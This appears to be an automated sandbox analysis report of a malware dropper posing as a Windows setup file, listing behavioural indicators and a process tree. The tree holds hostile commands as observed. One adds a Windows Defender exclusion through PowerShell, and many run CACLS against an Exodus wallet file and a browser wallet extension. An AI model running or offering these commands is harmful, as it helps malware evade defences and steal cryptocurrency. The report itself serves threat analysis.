WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Gathers network information 2 TTPs 4 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exeNETSTAT.EXENETSTAT.EXEipconfig.exepid process 1256 ipconfig.exe 5604 NETSTAT.EXE 4116 NETSTAT.EXE 5340 ipconfig.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 3144 taskkill.exe 5464 taskkill.exe -
Processes:
Conhost.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch Conhost.exe Set value (str) \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" Conhost.exe Key created \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Software\Microsoft\Internet Explorer\IESettingSync Conhost.exe Set value (int) \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" Conhost.exe -
Modifies registry class 1 IoCs
Processes:
620ee9f0f317f_Fri00dfd53221.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings 620ee9f0f317f_Fri00dfd53221.exe -
Runs net.exe
-
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 41 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
620ee9c20f6fc_Fri00f49041.exeConhost.exepowershell.exepid process 3712 620ee9c20f6fc_Fri00f49041.exe 3712 620ee9c20f6fc_Fri00f49041.exe 2372 2372 2372 2372 2372 2372 2372 2372 2372 2372 2372 2372 2372 2372 3952 Conhost.exe 3952 Conhost.exe 2372 2372 2372 2372 2372 2372 2372 2372 2372 2372 2372 2372 2372 2372 2372 2372 2372 2372 2372 2372 2372 2372 2372 2372 3952 Conhost.exe 3952 Conhost.exe 2372 2372 2372 2372 2372 2372 2372 2372 2372 2372 2372 2372 3324 powershell.exe 2372 2372 2372 2372 2372 2372 2372 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 2372 -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
620ee9c20f6fc_Fri00f49041.execacls.exepid process 3712 620ee9c20f6fc_Fri00f49041.exe 5516 cacls.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
rundll32.exepowershell.exe620ee9bbbbcb5_Fri003a32992dd.exeConhost.exedescription pid process Token: SeDebugPrivilege 180 rundll32.exe Token: SeShutdownPrivilege 2372 Token: SeCreatePagefilePrivilege 2372 Token: SeShutdownPrivilege 2372 Token: SeCreatePagefilePrivilege 2372 Token: SeShutdownPrivilege 2372 Token: SeCreatePagefilePrivilege 2372 Token: SeShutdownPrivilege 2372 Token: SeCreatePagefilePrivilege 2372 Token: SeShutdownPrivilege 2372 Token: SeCreatePagefilePrivilege 2372 Token: SeShutdownPrivilege 2372 Token: SeCreatePagefilePrivilege 2372 Token: SeShutdownPrivilege 2372 Token: SeCreatePagefilePrivilege 2372 Token: SeShutdownPrivilege 2372 Token: SeCreatePagefilePrivilege 2372 Token: SeShutdownPrivilege 2372 Token: SeCreatePagefilePrivilege 2372 Token: SeShutdownPrivilege 2372 Token: SeCreatePagefilePrivilege 2372 Token: SeDebugPrivilege 3324 powershell.exe Token: SeDebugPrivilege 3888 620ee9bbbbcb5_Fri003a32992dd.exe Token: SeRestorePrivilege 4112 Conhost.exe Token: SeBackupPrivilege 4112 Conhost.exe Token: SeShutdownPrivilege 2372 Token: SeCreatePagefilePrivilege 2372 Token: SeShutdownPrivilege 2372 Token: SeCreatePagefilePrivilege 2372 Token: SeShutdownPrivilege 2372 Token: SeCreatePagefilePrivilege 2372 Token: SeShutdownPrivilege 2372 Token: SeCreatePagefilePrivilege 2372 Token: SeShutdownPrivilege 2372 Token: SeCreatePagefilePrivilege 2372 Token: SeShutdownPrivilege 2372 Token: SeCreatePagefilePrivilege 2372 Token: SeShutdownPrivilege 2372 Token: SeCreatePagefilePrivilege 2372 Token: SeShutdownPrivilege 2372 Token: SeCreatePagefilePrivilege 2372 Token: SeShutdownPrivilege 2372 Token: SeCreatePagefilePrivilege 2372 Token: SeShutdownPrivilege 2372 Token: SeCreatePagefilePrivilege 2372 Token: SeShutdownPrivilege 2372 Token: SeCreatePagefilePrivilege 2372 Token: SeShutdownPrivilege 2372 Token: SeCreatePagefilePrivilege 2372 Token: SeShutdownPrivilege 2372 Token: SeCreatePagefilePrivilege 2372 Token: SeShutdownPrivilege 2372 Token: SeCreatePagefilePrivilege 2372 Token: SeShutdownPrivilege 2372 Token: SeCreatePagefilePrivilege 2372 Token: SeShutdownPrivilege 2372 Token: SeCreatePagefilePrivilege 2372 Token: SeShutdownPrivilege 2372 Token: SeCreatePagefilePrivilege 2372 Token: SeShutdownPrivilege 2372 Token: SeCreatePagefilePrivilege 2372 Token: SeShutdownPrivilege 2372 Token: SeCreatePagefilePrivilege 2372 Token: SeShutdownPrivilege 2372 -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
620ee9c09b72d_Fri00ef1dae.tmpfondue.exepid process 3248 620ee9c09b72d_Fri00ef1dae.tmp 4324 fondue.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
620ee9bdae9b2_Fri00129f9288f5.exe620ee9bdae9b2_Fri00129f9288f5.exeConhost.exepid process 724 620ee9bdae9b2_Fri00129f9288f5.exe 724 620ee9bdae9b2_Fri00129f9288f5.exe 3252 620ee9bdae9b2_Fri00129f9288f5.exe 3252 620ee9bdae9b2_Fri00129f9288f5.exe 2372 5016 Conhost.exe 5016 Conhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
win_setup__620eea0b11a3e.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 3524 wrote to memory of 3160 3524 win_setup__620eea0b11a3e.exe setup_installer.exe PID 3524 wrote to memory of 3160 3524 win_setup__620eea0b11a3e.exe setup_installer.exe PID 3524 wrote to memory of 3160 3524 win_setup__620eea0b11a3e.exe setup_installer.exe PID 3160 wrote to memory of 444 3160 setup_installer.exe setup_install.exe PID 3160 wrote to memory of 444 3160 setup_installer.exe setup_install.exe PID 3160 wrote to memory of 444 3160 setup_installer.exe setup_install.exe PID 444 wrote to memory of 1096 444 setup_install.exe cmd.exe PID 444 wrote to memory of 1096 444 setup_install.exe cmd.exe PID 444 wrote to memory of 1096 444 setup_install.exe cmd.exe PID 444 wrote to memory of 3232 444 setup_install.exe cmd.exe PID 444 wrote to memory of 3232 444 setup_install.exe cmd.exe PID 444 wrote to memory of 3232 444 setup_install.exe cmd.exe PID 444 wrote to memory of 3240 444 setup_install.exe cmd.exe PID 444 wrote to memory of 3240 444 setup_install.exe cmd.exe PID 444 wrote to memory of 3240 444 setup_install.exe cmd.exe PID 444 wrote to memory of 332 444 setup_install.exe cmd.exe PID 444 wrote to memory of 332 444 setup_install.exe cmd.exe PID 444 wrote to memory of 332 444 setup_install.exe cmd.exe PID 444 wrote to memory of 3040 444 setup_install.exe cmd.exe PID 444 wrote to memory of 3040 444 setup_install.exe cmd.exe PID 444 wrote to memory of 3040 444 setup_install.exe cmd.exe PID 444 wrote to memory of 3372 444 setup_install.exe cmd.exe PID 444 wrote to memory of 3372 444 setup_install.exe cmd.exe PID 444 wrote to memory of 3372 444 setup_install.exe cmd.exe PID 444 wrote to memory of 4084 444 setup_install.exe cmd.exe PID 444 wrote to memory of 4084 444 setup_install.exe cmd.exe PID 444 wrote to memory of 4084 444 setup_install.exe cmd.exe PID 444 wrote to memory of 3096 444 setup_install.exe cmd.exe PID 444 wrote to memory of 3096 444 setup_install.exe cmd.exe PID 444 wrote to memory of 3096 444 setup_install.exe cmd.exe PID 444 wrote to memory of 2516 444 setup_install.exe cmd.exe PID 444 wrote to memory of 2516 444 setup_install.exe cmd.exe PID 444 wrote to memory of 2516 444 setup_install.exe cmd.exe PID 444 wrote to memory of 2216 444 setup_install.exe cmd.exe PID 444 wrote to memory of 2216 444 setup_install.exe cmd.exe PID 444 wrote to memory of 2216 444 setup_install.exe cmd.exe PID 444 wrote to memory of 3952 444 setup_install.exe 11111.exe PID 444 wrote to memory of 3952 444 setup_install.exe 11111.exe PID 444 wrote to memory of 3952 444 setup_install.exe 11111.exe PID 444 wrote to memory of 836 444 setup_install.exe cmd.exe PID 444 wrote to memory of 836 444 setup_install.exe cmd.exe PID 444 wrote to memory of 836 444 setup_install.exe cmd.exe PID 444 wrote to memory of 3988 444 setup_install.exe cmd.exe PID 444 wrote to memory of 3988 444 setup_install.exe cmd.exe PID 444 wrote to memory of 3988 444 setup_install.exe cmd.exe PID 444 wrote to memory of 3320 444 setup_install.exe cmd.exe PID 444 wrote to memory of 3320 444 setup_install.exe cmd.exe PID 444 wrote to memory of 3320 444 setup_install.exe cmd.exe PID 3240 wrote to memory of 3176 3240 cmd.exe 620ee9bc939e5_Fri001f6e5e.exe PID 3240 wrote to memory of 3176 3240 cmd.exe 620ee9bc939e5_Fri001f6e5e.exe PID 3240 wrote to memory of 3176 3240 cmd.exe 620ee9bc939e5_Fri001f6e5e.exe PID 836 wrote to memory of 3348 836 cmd.exe 620ee9f8079d0_Fri009b6e1f0f0.exe PID 836 wrote to memory of 3348 836 cmd.exe 620ee9f8079d0_Fri009b6e1f0f0.exe PID 836 wrote to memory of 3348 836 cmd.exe 620ee9f8079d0_Fri009b6e1f0f0.exe PID 3096 wrote to memory of 3196 3096 cmd.exe 620ee9f0f317f_Fri00dfd53221.exe PID 3096 wrote to memory of 3196 3096 cmd.exe 620ee9f0f317f_Fri00dfd53221.exe PID 3096 wrote to memory of 3196 3096 cmd.exe 620ee9f0f317f_Fri00dfd53221.exe PID 3232 wrote to memory of 3888 3232 cmd.exe 620ee9bbbbcb5_Fri003a32992dd.exe PID 3232 wrote to memory of 3888 3232 cmd.exe 620ee9bbbbcb5_Fri003a32992dd.exe PID 3232 wrote to memory of 3888 3232 cmd.exe 620ee9bbbbcb5_Fri003a32992dd.exe PID 3040 wrote to memory of 724 3040 cmd.exe 620ee9bdae9b2_Fri00129f9288f5.exe PID 3040 wrote to memory of 724 3040 cmd.exe 620ee9bdae9b2_Fri00129f9288f5.exe PID 3040 wrote to memory of 724 3040 cmd.exe 620ee9bdae9b2_Fri00129f9288f5.exe PID 2516 wrote to memory of 4032 2516 cmd.exe 620ee9f3162da_Fri00b5daea42.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\win_setup__620eea0b11a3e.exe"C:\Users\Admin\AppData\Local\Temp\win_setup__620eea0b11a3e.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3524 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3160 -
C:\Users\Admin\AppData\Local\Temp\7zS85C45A7E\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS85C45A7E\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:444 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵PID:1096
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3324 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 620ee9bc939e5_Fri001f6e5e.exe4⤵
- Suspicious use of WriteProcessMemory
PID:3240 -
C:\Users\Admin\AppData\Local\Temp\7zS85C45A7E\620ee9bc939e5_Fri001f6e5e.exe620ee9bc939e5_Fri001f6e5e.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3176 -
C:\Users\Admin\AppData\Local\Temp\7zS85C45A7E\620ee9bc939e5_Fri001f6e5e.exeC:\Users\Admin\AppData\Local\Temp\7zS85C45A7E\620ee9bc939e5_Fri001f6e5e.exe6⤵PID:4376
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4376 -s 1527⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4752 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 620ee9bbbbcb5_Fri003a32992dd.exe4⤵
- Suspicious use of WriteProcessMemory
PID:3232 -
C:\Users\Admin\AppData\Local\Temp\7zS85C45A7E\620ee9bbbbcb5_Fri003a32992dd.exe620ee9bbbbcb5_Fri003a32992dd.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3888 -
C:\Users\Admin\AppData\Local\Temp\5addd772-d60a-4125-bb0b-b7b354887d4a.exe"C:\Users\Admin\AppData\Local\Temp\5addd772-d60a-4125-bb0b-b7b354887d4a.exe"6⤵PID:4828
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 620ee9bce72ea_Fri00a1d5e5045.exe4⤵PID:332
-
C:\Users\Admin\AppData\Local\Temp\7zS85C45A7E\620ee9bce72ea_Fri00a1d5e5045.exe620ee9bce72ea_Fri00a1d5e5045.exe5⤵PID:180
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
PID:3124 -
C:\Users\Admin\AppData\Local\Temp\File.exe"C:\Users\Admin\AppData\Local\Temp\File.exe"7⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4232 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\First.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\First.exe8⤵
- Executes dropped EXE
- Checks computer location settings
PID:4368 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo Y|CACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:N"9⤵PID:4484
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"10⤵PID:2156
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:N"10⤵PID:4740
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo Y|CACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:N"9⤵PID:4520
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"10⤵PID:1492
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:N"10⤵PID:4112
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c CACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:F" /E9⤵PID:4800
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:F" /E10⤵PID:4140
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c CACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:F" /E9⤵PID:4772
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:F" /E10⤵PID:4584
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo Y|CACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:N"9⤵PID:4280
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:N"10⤵PID:2360
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"10⤵PID:4272
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo Y|CACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:N"9⤵PID:2248
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"10⤵PID:3604
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:N"10⤵
- Executes dropped EXE
PID:4376 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c CACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:F" /E9⤵PID:388
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:F" /E10⤵PID:3272
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c CACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:F" /E9⤵PID:4200
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:F" /E10⤵PID:3228
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo Y|CACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:N"9⤵PID:4808
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"10⤵PID:5396
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:N"10⤵PID:5476
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo Y|CACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:N"9⤵PID:3988
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"10⤵PID:5212
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:N"10⤵PID:5304
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c CACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:F" /E9⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
PID:2800 -
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:F" /E10⤵PID:5380
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c CACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:F" /E9⤵PID:4480
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:F" /E10⤵PID:5416
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo Y|CACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:N"9⤵PID:5312
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"10⤵PID:5980
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:N"10⤵PID:6048
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo Y|CACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:N"9⤵PID:5296
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"10⤵PID:5872
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:N"10⤵PID:5920
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c CACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:F" /E9⤵PID:5440
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:F" /E10⤵PID:6032
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c CACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:F" /E9⤵PID:5468
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:F" /E10⤵PID:6040
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo Y|CACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:N"9⤵PID:5676
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"10⤵PID:1784
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:N"10⤵PID:4468
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo Y|CACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:N"9⤵PID:5668
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"10⤵PID:2828
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:N"10⤵PID:4944
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c CACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:F" /E9⤵PID:5756
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:F" /E10⤵PID:4116
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c CACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:F" /E9⤵PID:5796
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:F" /E10⤵PID:3696
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo Y|CACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:N"9⤵PID:4252
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"10⤵PID:2472
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:N"10⤵PID:5900
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo Y|CACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:N"9⤵PID:6136
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"10⤵PID:4264
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:N"10⤵PID:5708
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c CACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:F" /E9⤵PID:5456
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:F" /E10⤵PID:4836
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c CACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:F" /E9⤵PID:5568
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:F" /E10⤵PID:6076
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo Y|CACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:N"9⤵PID:5688
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"10⤵PID:5040
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:N"10⤵PID:5124
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo Y|CACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:N"9⤵PID:2252
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"10⤵PID:6116
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:N"10⤵PID:5824
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c CACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:F" /E9⤵PID:2988
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:4112 -
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:F" /E10⤵PID:3776
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c CACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:F" /E9⤵PID:5808
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:F" /E10⤵PID:5144
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo Y|CACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:N"9⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4272 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"10⤵PID:4480
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Exodus\exodus.wallet" /P "Admin:N"10⤵PID:3340
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo Y|CACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:N"9⤵PID:5240
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"10⤵PID:5876
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn" /P "Admin:N"10⤵PID:3380
-
